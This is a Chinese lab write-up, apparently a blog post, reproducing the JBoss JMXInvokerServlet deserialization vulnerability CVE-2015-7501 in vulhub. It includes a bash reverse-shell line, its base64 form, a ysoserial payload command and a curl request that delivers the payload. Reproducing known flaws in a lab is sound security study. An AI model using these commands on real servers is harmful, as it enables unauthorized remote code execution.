JBoss JMXInvokerServlet 反序列化漏洞复现(CVE-2015-7501)

一、漏洞说明

JBoss中/invoker/JMXInvokerServlet路径对外开放,JBoss的jmx组件支持反序列化。JBoss在/invoker/JMXInvokerServlet请求中读取了用户传入的对象,然后我们利用Apache Commons Collections中的Gadget执行任意代码。

二、影响版本

JBoss Enterprise Application Platform 6.4.4,5.2.0,4.3.0_CP10

JBoss AS (Wildly) 6 and earlier

JBoss A-MQ 6.2.0

JBoss Fuse 6.2.0

JBoss SOA Platform (SOA-P) 5.3.1

JBoss Data Grid (JDG) 6.5.0

JBoss BRMS (BRMS) 6.1.0

JBoss BPMS (BPMS) 6.1.0

JBoss Data Virtualization (JDV) 6.1.0

JBoss Fuse Service Works (FSW) 6.0.0

JBoss Enterprise Web Server (EWS) 2.1,3.0

三、搭建环境

cd vulhub\jboss\JMXInvokerServlet-deserialization

四、漏洞验证

访问:8080/invoker/JMXInvokerServlet,返回如下页面(下载文件),说明接口开放,此接口存在反序列化漏洞。

下载了以下文件

五、漏洞复现

1.nc开启监听

2.生成序列化数据

使用工具ysoserial.jar生成序列化数据

bash -i >& /dev/tcp/192.168.155.2/1111 0>&1

Base64编码后

YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE1NS4yLzExMTEgMD4mMQ==

所以payload:

java -jar ysoserial.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE1NS4yLzExMTEgMD4mMQ==}|{base64,-d}|{bash,-i} " >exp.ser

执行完该命令之后,会在本地桌面生成一个序列化的文件exp.ser,并利用cat查看其内容。

然后,将生成的exp复制到JavaDeserH2HC-master目录方便下一步利用

3.反弹shell

使用序列化数据反弹shell

curl http://192.168.25.128:8080/invoker/JMXInvokerServlet --data-binary @exp.ser

相关推荐
轻造科技5 小时前
设备点检系统+移动端APP:替代纸质点检表,漏检率降为0
网络·安全·web安全
沈千秋.12 小时前
文件包含[一道CTF题]
web安全·文件包含
祁白_14 小时前
文件包含笔记整理
笔记·学习·安全·web安全
恃宠而骄的佩奇14 小时前
网络安全面试题——安全服务
web安全·网络安全·面试·奇安信
乾元14 小时前
当奥本海默遇到图灵:AI 开启的网络安全新纪元
服务器·网络·人工智能·网络协议·安全·web安全
lifejump1 天前
Pikachu | XXE
服务器·web安全·网络安全·安全性测试
恃宠而骄的佩奇1 天前
蚁剑 php一句话木马简单免杀(编码)绕过360,火绒
开发语言·web安全·php·免杀·一句话木马·火绒安全
m0_738120721 天前
渗透测试——y0usef靶机渗透提权详细过程(插件伪造请求头)
服务器·网络·web安全·ssh·php
独行soc1 天前
2026年渗透测试面试题总结-1(题目+回答)
android·开发语言·网络·安全·web安全·渗透测试·php
lingggggaaaa1 天前
安全工具篇&MIMikatz&提权EXP&非源码修改方式&PE转ShellCode&融入加载
学习·安全·web安全·免杀对抗